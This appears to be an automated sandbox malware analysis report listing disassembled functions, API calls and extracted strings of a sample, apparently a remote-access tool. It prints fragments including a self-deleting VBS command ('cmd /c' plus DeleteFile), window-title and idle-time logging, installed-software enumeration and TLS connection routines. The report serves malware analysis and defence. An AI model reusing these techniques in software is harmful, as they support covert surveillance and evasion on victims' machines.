                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899193279-0
                                                                                                                                                    • Opcode ID: 193971ad51dc9e82ba84245e2e3a746999f337eb3d8d02e38318866f8452cc1e
                                                                                                                                                    • Instruction ID: 7096affe625f493fa95466426266b232fa3698418409a636840d588ec383d32a
                                                                                                                                                    • Opcode Fuzzy Hash: 193971ad51dc9e82ba84245e2e3a746999f337eb3d8d02e38318866f8452cc1e
                                                                                                                                                    • Instruction Fuzzy Hash: D0D13471E05715ABDB14DF68CC90A9DF7A9FF05320B0142EEE961A7281EB35B900CBE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15694D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 15694DD5
                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 15694E17
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 15694E37
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 15694E3E
                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 15694E76
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 15694E88
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 15694E8F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 15694E9E
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 15694EB5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                    • API String ID: 2490988753-744132762
                                                                                                                                                    • Opcode ID: 84cbf1256786c346c1957db37e7ecd0fcc49a901e9a702fa6edb1a0b3ecc5ff4
                                                                                                                                                    • Instruction ID: eb1489f0a50eae79db91f4418355a8f968630937c4b724b55c2fd08109b161d6
                                                                                                                                                    • Opcode Fuzzy Hash: 84cbf1256786c346c1957db37e7ecd0fcc49a901e9a702fa6edb1a0b3ecc5ff4
                                                                                                                                                    • Instruction Fuzzy Hash: 8931CEB290632AABD720DF64DC84E8B7BECFB85355F400A1DE89593204DB31D941CBE6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF6E94 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02DF6E9A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02DF6EAB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02DF6EBB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02DF6ECB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02DF6EDB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02DF6EEB
                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 02DF6EFB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                    • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                    • API String ID: 667068680-2233174745
                                                                                                                                                    • Opcode ID: 2342dc38812304770d38c964063abbf9be6e083a64a68626b605fd36e13017e3
                                                                                                                                                    • Instruction ID: bd6ccd6fc9c0f8d557b45e18abbb6a1c67075df34465e2208bb277b73a1d1150
                                                                                                                                                    • Opcode Fuzzy Hash: 2342dc38812304770d38c964063abbf9be6e083a64a68626b605fd36e13017e3
                                                                                                                                                    • Instruction Fuzzy Hash: CCF030E09E93842DBE407B323CC282A366DEA216187820C5D663765F86E675CC944BB4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 1569C6B1
                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 1569C6F5
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1569C9BF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseEnumOpen
                                                                                                                                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                    • API String ID: 1332880857-3714951968
                                                                                                                                                    • Opcode ID: ff9053f376cf122009ff93ae5f7c412430e6e8f7cc0ac66abcba05f77d2977bf
                                                                                                                                                    • Instruction ID: e8a49f23ffdf76746f326591d1d45df2b7f1bc53deb05dd1f0acfb61a04b8385
                                                                                                                                                    • Opcode Fuzzy Hash: ff9053f376cf122009ff93ae5f7c412430e6e8f7cc0ac66abcba05f77d2977bf
                                                                                                                                                    • Instruction Fuzzy Hash: B481FA7520A3859FD328DB20D850EEFB7E9BF94304F50492DA59A83150FF30B949CAD6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 1569D5DA
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 1569D5E9
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 1569D5F2
                                                                                                                                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 1569D60C
                                                                                                                                                    • Shell_NotifyIconA.SHELL32(00000002,156F4B48), ref: 1569D65D
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 1569D665
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 1569D66B
                                                                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 1569D680
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                    • String ID: Close
                                                                                                                                                    • API String ID: 1657328048-3535843008
                                                                                                                                                    • Opcode ID: 5cb15055144f88152dacfe037a12156a3370b8b082fc3d803c70baae5ba68cc3
                                                                                                                                                    • Instruction ID: 71ad73b1bf9ebed9a5bf6ceeff96f1d62d990358614f33384b89af480fc21607
                                                                                                                                                    • Opcode Fuzzy Hash: 5cb15055144f88152dacfe037a12156a3370b8b082fc3d803c70baae5ba68cc3
                                                                                                                                                    • Instruction Fuzzy Hash: 3A214A7182415CEFDB098FA0CD9EF693F7AFB15352F010629F906914A1DB729960DBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C5D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2509303402-0
                                                                                                                                                    • Opcode ID: cbda6163bc452f823d596a0dd0e4042e14a1f560d9b0d39e76ab4ed4eb441041
                                                                                                                                                    • Instruction ID: de41754d12fc07b5ee217aaebfe201ee62438e40e262f77bd75c3423115f5ecc
                                                                                                                                                    • Opcode Fuzzy Hash: cbda6163bc452f823d596a0dd0e4042e14a1f560d9b0d39e76ab4ed4eb441041
                                                                                                                                                    • Instruction Fuzzy Hash: 94B1CC75A04205AFDB10CFA8C880BEEBBF5FF08300F1045AAE5A5B7651DA75BD41CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D12C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 156D130A
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D051F
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0531
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0543
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0555
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0567
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0579
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D058B
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D059D
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05AF
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05C1
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05D3
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05E5
                                                                                                                                                      • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05F7
                                                                                                                                                    • _free.LIBCMT ref: 156D12FF
                                                                                                                                                      • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
                                                                                                                                                      • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
                                                                                                                                                    • _free.LIBCMT ref: 156D1321
                                                                                                                                                    • _free.LIBCMT ref: 156D1336
                                                                                                                                                    • _free.LIBCMT ref: 156D1341
                                                                                                                                                    • _free.LIBCMT ref: 156D1363
                                                                                                                                                    • _free.LIBCMT ref: 156D1376
                                                                                                                                                    • _free.LIBCMT ref: 156D1384
                                                                                                                                                    • _free.LIBCMT ref: 156D138F
                                                                                                                                                    • _free.LIBCMT ref: 156D13C7
                                                                                                                                                    • _free.LIBCMT ref: 156D13CE
                                                                                                                                                    • _free.LIBCMT ref: 156D13EB
                                                                                                                                                    • _free.LIBCMT ref: 156D1403
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                    • Opcode ID: c53b04d17bcca7ecdaaa3f35c2e5fa840a2298091f82a077f1eadeb67ae3fe69
                                                                                                                                                    • Instruction ID: 631fd12540b5bf90ea580c237b01006ef4676798bb3db699da055b9dd4f6aebd
                                                                                                                                                    • Opcode Fuzzy Hash: c53b04d17bcca7ecdaaa3f35c2e5fa840a2298091f82a077f1eadeb67ae3fe69
                                                                                                                                                    • Instruction Fuzzy Hash: 81317F31A08301DFDB108A39D840B5AB3E9FF04351F518D5AE8A5E7961DEB1BD80C7E8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156848C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • connect.WS2_32(FFFFFFFF,?,?), ref: 156848E0
                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 15684A00
                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 15684A0E
                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 15684A21
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                    • API String ID: 994465650-2151626615
                                                                                                                                                    • Opcode ID: e4579415cf4edae86d48537f46e531b9a475ead87e6f57fbf8e1bbf49f74eb6f
                                                                                                                                                    • Instruction ID: cb8fe7d9523c9686659c9a5d7ce43d3e17b336a8ef15cb307dc67f9fc0c45db2
                                                                                                                                                    • Opcode Fuzzy Hash: e4579415cf4edae86d48537f46e531b9a475ead87e6f57fbf8e1bbf49f74eb6f
                                                                                                                                                    • Instruction Fuzzy Hash: 5641E679B063066BDB14FB79CD5583D7A1AFB51114B80025DD8034BA59FF22B820CBE7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D0600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: 352fdd0512367db1a7e79e205feeff4e664dd1f44609d041f735d508e0a17579
                                                                                                                                                    • Instruction ID: 15fcf6e0b7eb8184f97838aab7eb3dd050fbe0c95146e8a048a4033b2cce4d51
                                                                                                                                                    • Opcode Fuzzy Hash: 352fdd0512367db1a7e79e205feeff4e664dd1f44609d041f735d508e0a17579
                                                                                                                                                    • Instruction Fuzzy Hash: 48C14076E41304ABDB20CAA8CC81FDEB7B8AB09750F144555FA45FB282E670BD41C7E4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15684E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,156F4EF8,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E38
                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E43
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E4C
                                                                                                                                                    • closesocket.WS2_32(FFFFFFFF), ref: 15684E5A
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E91
                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EA2
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EA9
                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EBA
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EBF
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EC4
                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684ED1
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684ED6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3658366068-0
                                                                                                                                                    • Opcode ID: ec204924bd021769b23fa31f5e07a33d2b41d9dd00e70615110036df1ea91984
                                                                                                                                                    • Instruction ID: 16d2964ea5e83dc2be643457cdc89a992b65db8246a15503990488806a872945
                                                                                                                                                    • Opcode Fuzzy Hash: ec204924bd021769b23fa31f5e07a33d2b41d9dd00e70615110036df1ea91984
                                                                                                                                                    • Instruction Fuzzy Hash: A7211A31115B14AFDB216B26CC48B16BBA6FF4033AF104A1DE5E2019F0CB61B851DB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02DE28CE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message
                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                    • API String ID: 2030045667-32948583
                                                                                                                                                    • Opcode ID: 2df0cb2fa01131769eba4dece9a7cd9d6fe73d7459f7fced8841d90a166a7f0c
                                                                                                                                                    • Instruction ID: 746242178a242111823bb7e052e4e07157bceee3d0be4255ca330a42e7ad64f3
                                                                                                                                                    • Opcode Fuzzy Hash: 2df0cb2fa01131769eba4dece9a7cd9d6fe73d7459f7fced8841d90a166a7f0c
                                                                                                                                                    • Instruction Fuzzy Hash: FFA1C670A042948BDF21BA2CCC88B9976EDEB09354F1441E5ED4A9B385CB758EC5CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 1568AD38
                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 1568AD43
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 1568AD49
                                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 1568AD52
                                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 1568AD86
                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1568AE54
                                                                                                                                                      • Part of subcall function 1568A636: SetEvent.KERNEL32(00000000,?,00000000,1568B20A,00000000), ref: 1568A662
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                    • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                    • API String ID: 911427763-3954389425
                                                                                                                                                    • Opcode ID: de3492a99a4419a0d8564cb8c9523aae82673fc19f6d049ea7c0bb89f54a6b41
                                                                                                                                                    • Instruction ID: f0bf6cef37c09ca50f07965c3fa57bc498b18666c6e8d9af22e8f9c9b6a5f98f
                                                                                                                                                    • Opcode Fuzzy Hash: de3492a99a4419a0d8564cb8c9523aae82673fc19f6d049ea7c0bb89f54a6b41
                                                                                                                                                    • Instruction Fuzzy Hash: 6D51C6757093419BC314DB30D894A6E77AABF84214F44092DF886832E0EF74BD45C7E6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568D7FF Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 15692850: TerminateProcess.KERNEL32(00000000,?,1568D80F), ref: 15692860
                                                                                                                                                      • Part of subcall function 15692850: WaitForSingleObject.KERNEL32(000000FF,?,1568D80F), ref: 15692873
                                                                                                                                                      • Part of subcall function 156936F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 15693714
                                                                                                                                                      • Part of subcall function 156936F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 1569372D
                                                                                                                                                      • Part of subcall function 156936F8: RegCloseKey.ADVAPI32(?), ref: 15693738
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1568D859
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,156E6468,156E6468,00000000), ref: 1568D9B8
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 1568D9C4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                    • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                    • API String ID: 1913171305-2411266221
                                                                                                                                                    • Opcode ID: 02a5486addaa6b0ae84f2ee698835f8df9a087e3b3ca3e966815b6c00af8dc0c
